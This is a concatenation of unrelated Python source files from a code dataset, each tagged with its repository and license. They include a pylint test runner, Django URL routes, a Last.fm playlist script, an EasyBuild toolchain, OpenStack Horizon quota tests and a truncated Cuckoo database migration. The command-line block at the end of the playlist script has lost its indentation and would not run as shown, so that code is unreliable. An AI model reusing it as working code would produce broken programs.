        # func_noerror_* inputs are expected to produce no messages at all
        if self.module.startswith('func_noerror_'):
            expected = ''
        else:
            output = open(self.output)
            expected = output.read().strip()
            output.close()
        got = self.linter.reporter.finalize().strip()
        try:
            self.assertLinesEquals(got, expected)
        except Exception, ex:
            # doesn't work with py 2.5
            #ex.file = tocheck
            #ex.__str__ = new.instancemethod(exception_str, ex, None)
            raise AssertionError('%s: %s' % (self.module, ex)), None, sys.exc_info()[-1]
class LintTestUsingFile(LintTestUsingModule):
    """Same functional checks, but passing file paths instead of dotted
    module names."""

    _TEST_TYPE = 'file'

    def test_functionality(self):
        targets = ['%s/%s.py' % (self.package, self.module)]
        if self.depends:
            targets.extend('%s/%s' % (self.package, name)
                           for name, _ in self.depends)
        self._test(targets)
class TestTests(testlib.TestCase):
    """check that all testable messages have been checked"""

    @testlib.tag('coverage')
    def test_exhaustivity(self):
        # Every non-fatal message id must have been emitted at least once
        # by the functional tests ('F' / fatal messages are skipped).
        remaining = [msgid for msgid in linter._messages.keys()
                     if msgid[0] != 'F']
        for msgid in test_reporter.message_ids.keys():
            try:
                remaining.remove(msgid)
            except ValueError:
                continue
        remaining.sort()
        # Known untested message ids, per interpreter version
        if PY25:
            self.assertEqual(remaining, ['E0503', 'I0001'])
        elif PY23:
            self.assertEqual(remaining, ['E0503', 'I0001'])
        else: # python < 2.3
            self.assertEqual(remaining, ['I0001'])
def make_tests(filter_rgx):
    """generate tests classes from test info

    :param filter_rgx: optional regexp; only matching input files get tests
    return the list of generated test classes
    """
    if filter_rgx:
        is_to_run = re.compile(filter_rgx).search
    else:
        is_to_run = lambda x: 1
    tests = []
    for module_file, messages_file in get_tests_info('func_', '.py') + [('nonexistant', 'messages/nonexistant.txt')]:
        # skip those tests with python >= 2.3 since py2.3 detects them by itself
        if PY23 and module_file == "func_unknown_encoding.py": #"func_nonascii_noencoding.py"):
            continue
        # "_pyNN" suffix marks inputs requiring at least Python N.N
        pyrestr = module_file.rsplit('_py', 1)[-1][:-3]
        if pyrestr.isdigit(): # '24', '25'...
            if sys.version_info < tuple([int(i) for i in pyrestr]):
                continue
        if not is_to_run(module_file):
            continue
        base = module_file.replace('func_', '').replace('.py', '')
        dependencies = get_tests_info(base, '.py')

        # NOTE: class attributes bind module_file/messages_file at class
        # creation time, so every generated class keeps its own input
        class LintTestUsingModuleTC(LintTestUsingModule):
            module = module_file.replace('.py', '')
            output = messages_file
            depends = dependencies or None
            tags = testlib.Tags(('generated','pylint_input_%s' % module))
        tests.append(LintTestUsingModuleTC)

        if MODULES_ONLY:
            continue

        class LintTestUsingFileTC(LintTestUsingFile):
            module = module_file.replace('.py', '')
            # prefer a ".txt2" expected file when present (file-mode output
            # may differ from module-mode output)
            output = exists(messages_file + '2') and (messages_file + '2') or messages_file
            depends = dependencies or None
            tags = testlib.Tags(('generated', 'pylint_input_%s' % module))
        tests.append(LintTestUsingFileTC)

    ## # special test for f0003
    ##     module_file, messages_file in get_tests_info('func_f0003', '.pyc')
    ##     class LintTestSubclass(LintTest):
    ##         module = module_file.replace('.pyc', '')
    ##         output = messages_file
    ##         depends = dependencies or None
    ##     tests.append(LintTestSubclass)

    # also check that pylint can analyze a builtin (C) module
    class LintBuiltinModuleTest(LintTestUsingModule):
        output = 'messages/builtin_module.txt'
        module = 'sys'
        def test_functionality(self):
            self._test(['sys'])
    tests.append(LintBuiltinModuleTest)

    if not filter_rgx:
        # test all features are tested :)
        tests.append(TestTests)

    return tests
# Module-name filter (regexp) and modules-only flag; both may be overridden
# from the command line in the __main__ block below.
FILTER_RGX = None
MODULES_ONLY = False
def suite():
    """Build the unittest suite from all generated test classes."""
    return unittest.TestSuite([unittest.makeSuite(test)
                               for test in make_tests(FILTER_RGX)])
if __name__=='__main__':
    # '-m' restricts the run to module-name based tests (skips file variants).
    if '-m' in sys.argv:
        MODULES_ONLY = True
        sys.argv.remove('-m')
    # First remaining argument, if any, is a regexp filtering the inputs.
    if len(sys.argv) > 1:
        FILTER_RGX = sys.argv[1]
        del sys.argv[1]
    testlib.unittest_main(defaultTest='suite')
| dbbhattacharya/kitsune | vendor/packages/pylint/test/test_func.py | Python | bsd-3-clause | 7,955 | 0.007291 |
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.urls import path
from confla import views
app_name = "confla"

# URL routes for the confla app.
#
# NOTE: every regex pattern must be anchored with '^'. Django matches URL
# regexes with search(), so an unanchored pattern would also match any URL
# that merely *ends* with it.
urlpatterns = [
    path('admin/', admin.site.urls),
    url(r'^$', views.IndexView.my_view, name='index'),
    # Bugfix: pattern was missing its leading '^' anchor.
    url(r'^add_rooms/$', views.AddRoomsView.view_form, name='add_rooms'),
    url(r'^events/popover/$', views.EventView.get_popover, name='eventPop'),
    url(r'^events/modal/$', views.EventEditView.event_modal, name='eventMod'),
    # Authentication.
    url(r'^login/$', views.LoginView.my_view, name='login'),
    url(r'^logout/$', views.LoginView.logout, name='logout'),
    url(r'^process/$', views.LoginView.auth_and_login, name='process_login'),
    # User management.
    url(r'^users/$', views.UserView.my_view, name='users'),
    url(r'^user/(?P<url_username>\w+)/profile/$', views.UserView.view_profile, name='profile'),
    url(r'^user/(?P<url_username>\w+)/delete_mail/(?P<id>\d+)/', views.UserView.delete_email, name='delete_email'),
    url(r'^user/(?P<url_username>\w+)/set_primary_mail/(?P<id>\d+)/', views.UserView.set_email_primary, name='set_primary_email'),
    url(r'^user/volunteer/$', views.VolunteerView.my_view, name='volunteer'),
    url(r'^register/$', views.RegisterView.user_register, name='register'),
    url(r'^reset_password/$', views.RegisterView.reset_password, name='reset_password'),
    url(r'^reset_password2/(?P<email_address>[^/]+)/(?P<token>[^/]+)$', views.RegisterView.reset_password2, name='reset_password2'),
    #url(r'^reg_talk/$', views.RegisterView.save_form_and_register, name='reg_talk'),
    #url(r'^notlogged/$', views.UserView.not_logged, name='notlogged'),
    url(r'^i18n/', include('django.conf.urls.i18n'), name='set_language'),
    # Per-conference public pages (url_id selects the conference).
    url(r'^(?P<url_id>\w+)/$', views.AboutView.splash_view, name='splash'),
    url(r'^(?P<url_id>\w+)/cfp/$', views.CfpView.save_form_and_register, name='cfp'),
    url(r'^(?P<url_id>\w+)/about/$', views.AboutView.splash_view, name='about'),
    url(r'^(?P<url_id>\w+)/events/$', views.EventView.event_list, name='event_list'),
    url(r'^(?P<url_id>\w+)/places/$', views.PlacesView.osm, name='places'),
    url(r'^(?P<url_id>\w+)/about/(?P<page>\w+)$', views.PagesView.content, name='pages'),
    url(r'^(?P<url_id>\w+)/speakers/grid/$', views.UserView.speaker_grid, name='speaker_grid'),
    url(r'^(?P<url_id>\w+)/speakers/list/$', views.UserView.speaker_list, name='speaker_list'),
    url(r'^(?P<url_id>\w+)/sched/$', views.ScheduleView.my_view, name='schedule'),
    url(r'^(?P<url_id>\w+)/sched/list/$', views.ScheduleView.list_view, name='listsched'),
    url(r'^(?P<url_id>\w+)/sched/list/(?P<id>\d+)/$', views.ScheduleView.list_view, name='listschedTag'),
    url(r'^(?P<url_id>\w+)/config/$', views.RoomConfView.slot_view, name='conf_rooms'),
    url(r'^(?P<url_id>\w+)/config/save/$', views.RoomConfView.save_config, name='rooms_conf_save'),
    url(r'^(?P<url_id>\w+)/export/m_app/$', views.ExportView.m_app, name='export_mapp'),
    url(r'^(?P<url_id>\w+)/export/csv/$', views.ExportView.csv, name='export_csv'),
    # Organisation-wide admin.
    url(r'^org/admin/geo_icons/$', views.IconsView.table, name='geo_icons'),
    url(r'^org/admin/geo_points/$', views.PlacesView.table, name='geo_points'),
    url(r'^org/admin/stats/$', views.AdminView.dashboard, name='org_dashboard'),
    url(r'^org/admin/newconf/$', views.ConferenceView.create_conf, name='create_conf'),
    url(r'^org/admin/createroom/$', views.ConferenceView.create_room, name='create_room'),
    url(r'^org/admin/createtag/$', views.EventEditView.create_event_tag, name='create_event_tag'),
    url(r'^org/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf'),
    url(r'^org/admin/users/$', views.AdminView.users, name='org_users'),
    url(r'^org/admin/$', views.AdminView.conf_list, name='org_conf_list'),
    url(r'^export/conference_list/$', views.ExportView.conf_list, name='conf_list_export'),
    # Per-conference admin.
    url(r'^(?P<url_id>\w+)/admin/$', views.AdminView.dashboard, name='dashboard'),
    url(r'^(?P<url_id>\w+)/admin/conf/edit/$', views.ConferenceView.edit_conf, name='edit_conf'),
    url(r'^(?P<url_id>\w+)/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf_urlid'),
    url(r'^(?P<url_id>\w+)/admin/pages/$', views.PagesView.pages_list, name='admin_pages'),
    url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/edit/$', views.PagesView.edit_page, name='edit_page'),
    url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/save/$', views.PagesView.save_page, name='save_page'),
    url(r'^(?P<url_id>\w+)/admin/users/$', views.AdminView.users, name='speakers'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/$', views.TimetableView.view_timetable, name='adminsched'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/saveTable/$', views.TimetableView.save_timetable, name='saveTable'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/saveEvent/$', views.TimetableView.save_event, name='saveEvent'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/popover/$', views.EventView.get_admin_popover, name='eventPop_admin'),
    # 'editEvent' is registered twice on purpose: reverse() disambiguates by
    # the presence/absence of the id argument.
    url(r'^(?P<url_id>\w+)/admin/eventlist/$', views.EventEditView.event_view, name='editEvent'),
    url(r'^(?P<url_id>\w+)/admin/eventlist/(?P<id>\d+)/$', views.EventEditView.event_view, name='editEvent'),
    url(r'^(?P<url_id>\w+)/admin/eventlist/editEvent/(?P<id>\d+)/$', views.EventEditView.event_save, name='editEvent2'),
    url(r'^(?P<url_id>\w+)/admin/import/$', views.ImportView.import_view, name='import'),
    url(r'^(?P<url_id>\w+)/admin/import/json/$', views.ImportView.json_upload, name='json_import'),
    url(r'^(?P<url_id>\w+)/admin/export/$', views.ExportView.export_view, name='export'),
    url(r'^activate/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$', views.RegisterView.activate_email, name='activate_email'),
]
# Serve user-uploaded media in development.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| rh-lab-q/conflab | wsgi/openshift/confla/urls.py | Python | gpl-3.0 | 6,136 | 0.008638 |
from pprint import pprint
from django.shortcuts import render
def index(request):
    """Render the itat application's landing page."""
    template_name = 'itat/index.html'
    return render(request, template_name)
| anselmobd/fo2 | src/itat/views/views.py | Python | mit | 131 | 0 |
# -*- coding: utf-8 -*-
import ConfigParser, sys, os, urllib2, json, time, shutil, filecmp
import Levenshtein
# Module-wide configuration, read once at import time from config.ini
# (expects a [lastfm] section; see the playlist class).
config = ConfigParser.ConfigParser()
config.read("config.ini")
def clean(chaine):
    """Normalise a string for comparison: trim surrounding whitespace, lowercase."""
    return chaine.strip().lower()
def decode(chaine):
    """Replace curly quotes with ASCII apostrophes and best-effort
    transliterate the string to ASCII (accents stripped).

    Falls back to returning the quote-normalised string when the
    transliteration fails.
    """
    # Bugfix: unicodedata was referenced but never imported at module level,
    # so the except branch always fired and accents were never stripped.
    import unicodedata
    chaine = chaine.replace(u"\u2018", "'").replace(u"\u2019", "'")
    try:
        return unicodedata.normalize('NFKD', chaine).encode('ascii', 'ignore')
    except Exception:
        return chaine
def remove_accents(input_str):
    """Return *input_str* with combining accent marks removed
    (e.g. u'café' -> u'cafe'); the input is returned unchanged on failure.
    """
    # Bugfix: unicodedata was referenced but never imported at module level,
    # so this function silently returned its input unchanged.
    import unicodedata
    try:
        try:
            text = unicode(input_str)   # Python 2
        except NameError:
            text = str(input_str)       # Python 3 fallback
        nkfd_form = unicodedata.normalize('NFKD', text)
        return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
    except Exception:
        return input_str
def cc(i):
    """Fully normalise a name for matching: strip accents, trim/lowercase,
    then ASCII-fold quotes and remaining non-ASCII characters."""
    unaccented = remove_accents(i)
    cleaned = clean(unaccented)
    return decode(cleaned)
def getKey(item):
    """Sort key used when ranking fuzzy matches: the leading element
    (the Levenshtein distance)."""
    (first,) = item[:1]
    return first
class playlist:
    """Build an .m3u playlist of the user's Last.fm top tracks by matching
    them against a local music collection (exact or Levenshtein fuzzy
    matching), optionally copying matched files to a second directory
    (e.g. a music-player mount point).
    """
    def __init__(self, limit, page=1, period="overall"):
        # Credentials and paths come from the [lastfm] section of config.ini.
        self.api_key = config.get("lastfm",'key')
        self.music_dir = config.get("lastfm",'directory')
        self.page = page
        self.mp_dir = config.get("lastfm",'mudir')
        self.user = config.get("lastfm",'user')
        # Cached listing of the top-level artist directories.
        self.dossier = os.listdir(self.music_dir)
        self.period = period
        self.limit = limit
        self.notfound = []
    #for i in req!
    def lastfm(self, meth):
        """Call the Last.fm REST API; *meth* is a pre-built query-string
        fragment. Returns the decoded JSON payload, or None on HTTP error."""
        try:
            url = 'http://ws.audioscrobbler.com/2.0/?api_key='+self.api_key+'&autocorrect=1'+meth+'&format=json&page='+str(self.page)
            txt = urllib2.urlopen(url).read()
            return json.loads(txt)
        except urllib2.HTTPError:
            #print '\n Error : '+art
            return None
    def toptracks(self):
        """Yield {'name', 'artist'} dicts for the user's top tracks,
        with artist names normalised via cc()."""
        url = '&method=user.gettoptracks&user='+self.user+'&limit='+self.limit+'&period='+self.period;
        req = self.lastfm(url)
        for i in req["toptracks"]["track"]:
            #if cc(i['artist']['name']) == "high tone":
                yield {'name':i['name'],'artist':cc(i['artist']['name'])}
    """Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
    def findartist(self, artist):
        """Locate the directory of *artist*: exact normalised match first,
        otherwise the unique closest Levenshtein candidate (None when
        ambiguous or not found)."""
        textlog = " find (" + artist + "):\n"
        lev = {}
        # Each artist directory in the collection.
        for art in self.dossier:
            ar = cc(art)
            # Exact match (case-, accent- and whitespace-insensitive).
            if ar == artist:
                ##print "YES BITCH"
                return art
            # Levenshtein distance: keep candidates that are close enough.
            elif abs(len(ar) - len(artist)) < 5:
                l = Levenshtein.distance(ar, artist)
                if l < (len(art)/2):
                    if not l in lev.keys():
                        lev[l] = []
                    lev[l].append(art)
        # Pick the single best candidate, if unambiguous.
        textlog += str(lev) + "\n"
        if lev != {} and len( lev[min(lev.keys())] ) == 1:
            ##print lev[min(lev.keys())][0]
            ##print "YES BIS BITCHY BITCH"
            return lev[min(lev.keys())][0]
        else:
            pass ##print textlog
    """Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
    def findtrack(self, artist, track, i=0, lev=False):
        """Recursively walk the *artist* directory and yield matches for
        *track*: file paths on substring match, or [distance, path] pairs
        when *lev* (fuzzy mode) is enabled."""
        # Every entry under the artist directory.
        base = self.music_dir + "/" + artist
        for fil in os.listdir(base):
            if os.path.isdir(base +"/"+ fil):
                ##print ("findtrack " + artist + " / " + fil + " - " + track)
                try:
                    for result in self.findtrack(artist + "/" + fil, track, i=i+1, lev=lev):
                        yield result
                except UnicodeDecodeError:
                    pass
            if os.path.isfile(base +"/"+ fil):
                if lev:
                    # Fuzzy mode: compare normalised names, extension stripped.
                    nfil = cc(clean(unicode(fil[:-4],'utf-8')))
                    ntr = cc(clean(track))
                    l = Levenshtein.distance(ntr, nfil)
                    if l < len(ntr):
                        ##print "lev |" + ntr + "|" + nfil + "|"
                        ##print str(l) + " - " + str(len(cc(track)))
                        yield [l, base+"/"+fil]
                else:
                    # Exact mode: case-insensitive substring match.
                    if clean(track) in clean(unicode(fil,'utf-8')):
                        ##print base+"/"+fil
                        yield base+"/"+fil
    def mkdirs(self, li, pat):
        """Recursively create the directory chain *li* under *pat* and
        return the deepest path (like os.makedirs, but tolerant)."""
        if li != []:
            dd = os.path.join(pat, li[0])
            if not os.path.isdir( dd ):
                ##print "mkdir(" + dd+")"
                os.mkdir(dd)
            return self.mkdirs(li[1:], dd)
        else:
            return pat
    def move(self, t):
        """Copy track file *t* into the player directory, mirroring its
        relative layout; returns 1 when an identical copy already exists."""
        dirs = t[len(self.music_dir)+1:].split("/")
        new = self.mkdirs(dirs[:-1], self.mp_dir)
        dst = os.path.join(new, dirs[-1])
        if os.path.isfile( dst ):
            # Re-copy only when the sizes differ.
            if os.path.getsize(t) != os.path.getsize(dst):
                os.remove(dst)
            else:
                return 1
        shutil.copyfile(t, dst)
        ##print "exist"
        #shutil.copyfile(t, dst)
    def findtrackall(self, a, i):
        """Find track i['name'] under artist directory *a*: first exact
        substring match, then best fuzzy match; returns 0 when not found."""
        for t in self.findtrack(a, i['name']):
            return t
        ##print "### :: " + i['artist'] + '-' + i['name'] + ""
        ties = []
        for t in self.findtrack(a, i['name'], lev=True):
            ties.append(t)
        if len(ties) == 0:
            return 0
        if len(ties) == 1:
            ##print ties[0][1]
            return ties[0][1]
        else:
            # Several fuzzy candidates: keep the smallest distance.
            ties = sorted(ties, key=getKey)
            ##print ties[0][1]
            return ties[0][1]
    def run(self):
        """Fetch the top tracks, resolve each to a local file, write the
        matches to a timestamped .m3u file and optionally copy them."""
        file = time.strftime("TOP"+self.limit+"_%m%d%H%M.m3u")
        fo = open(file, 'w+')
        number = 0
        for i in self.toptracks():
            number += 1
            print number
        #for i in [{'name':u"The sound of silence",'artist':u"Simon and Garfunkel"}]:
            a = self.findartist(i['artist'])
            t = 0
            if a:
                t = self.findtrackall(a, i)
                if t == 0:
                    # Fall back to the compilations directory.
                    t = self.findtrackall("Various Artists", i)
                ##print t
                if t != 0:
                    fo.write(t+"\n")
                    if os.path.isdir( self.mp_dir ):
                        self.move(t)
            else:
                #print "###########"
                #print i['artist'] + '-' + i['name']
                pass
        #print self.notfound
        #print '--finished--'
        fo.close()
# <?xml version="1.0" encoding="UTF-8"?>
# <playlist version="1" xmlns="http://xspf.org/ns/0/">
#   <trackList>
#     <track><location>file:///media/data/Musique/Cypress Hill/2010 - Rise Up/Cypress Hill - Rise Up - 13 - Armed and Dangerous.mp3</location></track>
#     <track><location>file:///media/data/Musique/The Black Keys/Attack & Release/The Black Keys - Psychotic Girl.mp3</location></track>
#     <track><location>file:///media/data/Musique/Odezenne/2012 - OVNI edition Louis XIV/13 - Hirondelles.mp3</location></track>
#   </trackList>
# </playlist>
        pass
if len(sys.argv) == 0 :
print "usage : python playlist.py length page"
else:
if len(sys.argv) <= 1 :
p = playlist(100)
elif len(sys.argv) <= 2 :
p = playlist(sys.argv[1])
elif len(sys.argv) <= 3 :
p = playlist(sys.argv[1], sys.argv[2])
else: p = playlist(sys.argv[1], sys.argv[2], sys.argv[3])
p.run()
| pdevetto/misc | lastfm/playlist.py | Python | gpl-3.0 | 7,352 | 0.010473 |
##
# Copyright 2012-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for gomkl compiler toolchain (includes GCC, OpenMPI,
Intel Math Kernel Library (MKL) and Intel FFTW wrappers).
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
:author: Ake Sandgren (Umea University)
"""
from easybuild.toolchains.gompi import Gompi
from easybuild.toolchains.gmkl import Gmkl
from easybuild.toolchains.fft.intelfftw import IntelFFTW
from easybuild.toolchains.linalg.intelmkl import IntelMKL
class Gomkl(Gompi, IntelMKL, IntelFFTW):
    """Compiler toolchain with GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers."""
    NAME = 'gomkl'
    # Direct parent toolchains: gompi (GCC + OpenMPI) and gmkl (GCC + MKL).
    SUBTOOLCHAIN = [Gompi.NAME, Gmkl.NAME]
| hpcugent/easybuild-framework | easybuild/toolchains/gomkl.py | Python | gpl-2.0 | 1,727 | 0.001737 |
import json
from rhino import Mapper, get
# Our internal representation
# Sample resource served by get_report; each representation version below
# exposes a subset of these fields.
report = {
    'title': 'foo',
    'author': 'Fred',
    'date': '2015-01-09',
    'tags': ['a', 'b', 'c'],
}
# Base class for our representations
class report_repr(object):
    """Base class for report representations.

    Subclasses declare ``provides`` (the media type they serve) and
    ``fields`` (which keys of the report dict they expose).
    """
    @classmethod
    def serialize(cls, report):
        """Return the report as a JSON string restricted to ``cls.fields``."""
        # dict comprehension instead of dict([(k, v) for ...]) -- same result,
        # idiomatic form.
        obj = {k: report[k] for k in cls.fields}
        return json.dumps(obj, sort_keys=True)
# Different versions of the representation
class report_v1(report_repr):
    # v1 media type: only title and author.
    provides = 'application/vnd.acme.report+json;v=1'
    fields = ['title', 'author']
class report_v2(report_repr):
    # v2 media type: adds the date field.
    provides = 'application/vnd.acme.report+json;v=2'
    fields = ['title', 'author', 'date']
class report_v3(report_repr):
    # v3 media type: adds the tags field.
    provides = 'application/vnd.acme.report+json;v=3'
    fields = ['title', 'author', 'date', 'tags']
# One handler can handle multiple representations.
# Here, report_v3 is the default when the client doesn't specify a preference.
@get(produces=report_v1)
@get(produces=report_v2)
@get(produces=report_v3)
def get_report(request):
    """Return the report; content negotiation selects one of the three
    registered representations (v3 is the default, being listed last)."""
    return report
# Route the root URL to the handler and serve when run as a script.
app = Mapper()
app.add('/', get_report)
if __name__ == '__main__':
    app.start_server()
| trendels/rhino | examples/content_type_versioning.py | Python | mit | 1,165 | 0.004292 |
# Copyright 2013 Kylin, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.urls import reverse
import mock
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
INDEX_URL = reverse('horizon:admin:defaults:index')  # resolved once; tests GET/redirect here
class ServicesViewTests(test.BaseAdminViewTests):
    """Tests for the admin 'Defaults' index view (default quota listings)."""
    @test.create_mocks({
        api.nova: [('default_quota_get', 'nova_default_quota_get')],
        api.cinder: [('default_quota_get', 'cinder_default_quota_get'),
                     'is_volume_service_enabled'],
        api.base: ['is_service_enabled'],
        api.neutron: [('default_quota_get', 'neutron_default_quota_get')],
        quotas: ['enabled_quotas']})
    def test_index(self):
        """Index page renders compute, volume and network default quotas."""
        # Neutron does not have an API for getting default system
        # quotas. When not using Neutron, the floating ips quotas
        # should be in the list.
        self.mock_is_volume_service_enabled.return_value = True
        self.mock_is_service_enabled.return_value = True
        compute_quotas = [q.name for q in self.quotas.nova]
        self.mock_enabled_quotas.return_value = compute_quotas
        self.mock_nova_default_quota_get.return_value = self.quotas.nova
        self.mock_cinder_default_quota_get.return_value = \
            self.cinder_quotas.first()
        self.mock_neutron_default_quota_get.return_value = \
            self.neutron_quotas.first()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'admin/defaults/index.html')
        # Compute tab contents.
        expected_data = [
            '<Quota: (injected_file_content_bytes, 1)>',
            '<Quota: (metadata_items, 1)>',
            '<Quota: (injected_files, 1)>',
            '<Quota: (ram, 10000)>',
            '<Quota: (instances, 10)>',
            '<Quota: (cores, 10)>',
            '<Quota: (key_pairs, 100)>',
            '<Quota: (server_groups, 10)>',
            '<Quota: (server_group_members, 10)>',
            '<Quota: (injected_file_path_bytes, 255)>',
        ]
        self._check_quotas_data(res, 'compute_quotas', expected_data)
        # Volume tab contents.
        expected_data = [
            '<Quota: (gigabytes, 1000)>',
            '<Quota: (snapshots, 1)>',
            '<Quota: (volumes, 1)>',
        ]
        self._check_quotas_data(res, 'volume_quotas', expected_data)
        # Network tab contents.
        expected_data = [
            '<Quota: (network, 10)>',
            '<Quota: (subnet, 10)>',
            '<Quota: (port, 50)>',
            '<Quota: (router, 10)>',
            '<Quota: (floatingip, 50)>',
            '<Quota: (security_group, 20)>',
            '<Quota: (security_group_rule, 100)>',
        ]
        self._check_quotas_data(res, 'network_quotas', expected_data)
        # Verify each mocked API call happened exactly as expected.
        self.mock_is_volume_service_enabled.assert_called_once_with(
            test.IsHttpRequest())
        self.assertEqual(2, self.mock_is_service_enabled.call_count)
        self.mock_is_service_enabled.assert_has_calls([
            mock.call(test.IsHttpRequest(), 'compute'),
            mock.call(test.IsHttpRequest(), 'network')])
        self.assert_mock_multiple_calls_with_same_arguments(
            self.mock_enabled_quotas, 4,
            mock.call(test.IsHttpRequest()))
        self.mock_nova_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.tenant.id)
        self.mock_cinder_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.tenant.id)
        self.mock_neutron_default_quota_get.assert_called_once_with(
            test.IsHttpRequest())
    def _check_quotas_data(self, res, slug, expected_data):
        """Assert the quota table of tab *slug* contains *expected_data*."""
        quotas_tab = res.context['tab_group'].get_tab(slug)
        self.assertQuerysetEqual(quotas_tab._tables[slug].data,
                                 expected_data,
                                 ordered=False)
class UpdateDefaultQuotasTests(test.BaseAdminViewTests):
    """Tests for the 'Update Default Quotas' workflow."""
    def _get_quota_info(self, quota):
        """Flatten a quota set into a {field: int limit} form-post dict,
        skipping the non-updatable 'fixed_ips' field."""
        quota_data = {}
        updatable_quota_fields = (quotas.NOVA_QUOTA_FIELDS |
                                  quotas.CINDER_QUOTA_FIELDS)
        for field in updatable_quota_fields:
            if field != 'fixed_ips':
                limit = quota.get(field).limit or 10
                quota_data[field] = int(limit)
        return quota_data
    @test.create_mocks({
        api.nova: [('default_quota_update', 'nova_default_quota_update'),
                   ('default_quota_get', 'nova_default_quota_get')],
        api.cinder: [('default_quota_update', 'cinder_default_quota_update'),
                     ('default_quota_get', 'cinder_default_quota_get')],
        quotas: ['get_disabled_quotas']})
    def test_update_default_quotas(self):
        """Posting the workflow updates nova and cinder default quotas."""
        quota = self.quotas.first() + self.cinder_quotas.first()
        self.mock_get_disabled_quotas.return_value = set()
        self.mock_nova_default_quota_get.return_value = self.quotas.first()
        self.mock_nova_default_quota_update.return_value = None
        self.mock_cinder_default_quota_get.return_value = \
            self.cinder_quotas.first()
        self.mock_cinder_default_quota_update.return_value = None
        # update some fields
        quota[0].limit = 123
        quota[1].limit = -1
        updated_quota = self._get_quota_info(quota)
        url = reverse('horizon:admin:defaults:update_defaults')
        res = self.client.post(url, updated_quota)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
        self.mock_get_disabled_quotas.assert_called_once_with(
            test.IsHttpRequest())
        # Nova should receive every updatable compute field except fixed_ips.
        nova_fields = quotas.NOVA_QUOTA_FIELDS
        nova_updated_quota = dict((key, updated_quota[key]) for key in
                                  nova_fields if key != 'fixed_ips')
        self.mock_nova_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.request.user.tenant_id)
        self.mock_nova_default_quota_update.assert_called_once_with(
            test.IsHttpRequest(), **nova_updated_quota)
        # Cinder should receive all volume quota fields.
        cinder_updated_quota = dict((key, updated_quota[key]) for key in
                                    quotas.CINDER_QUOTA_FIELDS)
        self.mock_cinder_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.request.user.tenant_id)
        self.mock_cinder_default_quota_update.assert_called_once_with(
            test.IsHttpRequest(), **cinder_updated_quota)
| NeCTAR-RC/horizon | openstack_dashboard/dashboards/admin/defaults/tests.py | Python | apache-2.0 | 6,926 | 0 |
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Added failed statuses to tasks (from Cuckoo 1.1 to 1.2)
Revision ID: 495d5a6edef3
Revises: 18eee46c6f81
Create Date: 2015-02-28 19:08:29.284111
"""
# Spaghetti as a way of life.
# Revision identifiers, used by Alembic.
# Alembic migration chain identifiers.
revision = "495d5a6edef3"
down_revision = "18eee46c6f81"
import sqlalchemy as sa
from datetime import datetime
from alembic import op
from dateutil.parser import parse
import cuckoo.core.database as db
def upgrade():
    """Add the 'failed_reporting' value to the tasks.status ENUM.

    PostgreSQL supports ALTER TYPE directly; MySQL and SQLite do not, so for
    those the tasks table is read into memory, dropped, recreated with the
    1.2 schema and repopulated.
    """
    conn = op.get_bind()
    # Deal with Alembic shit.
    # Alembic is so ORMish that it was impossible to write code which works on different DBMS.
    if conn.engine.driver == "psycopg2":
        # Altering status ENUM.
        # This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type.
        # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
        op.execute('COMMIT')
        conn.execute("ALTER TYPE status_type ADD VALUE 'failed_reporting'")
    else:
        # Read data.
        tasks_data = []
        old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, clock, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
        for item in old_tasks:
            d = {}
            d["id"] = item[0]
